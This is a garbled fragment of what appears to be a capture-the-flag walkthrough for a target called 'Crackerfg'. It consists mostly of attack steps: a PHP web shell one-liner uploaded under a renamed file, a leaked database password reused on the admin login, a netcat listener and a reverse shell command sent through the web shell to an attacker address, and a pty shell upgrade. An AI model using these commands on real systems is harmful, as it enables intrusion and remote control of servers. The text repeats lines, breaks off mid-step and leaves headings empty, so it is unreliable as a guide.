Link Crackerfg -

eval system($_GET['cmd']); Rename as shell.fg . After upload, the server stores it in /uploads/shell.fg . Trigger via:

Read the flag:

$db_user = "webapp"; $db_pass = "crackme_123"; Try admin:crackme_123 on the login page → success. crackerfg

You get RCE as www-data . # On attacker machine nc -lvnp 4444 Via the web shell cmd=nc -e /bin/bash 10.10.14.14 4444 eval system($_GET['cmd']); Rename as shell

python3 -c 'import pty;pty.spawn("/bin/bash")' Check sudo: Rename as shell.fg . After upload

Stable shell: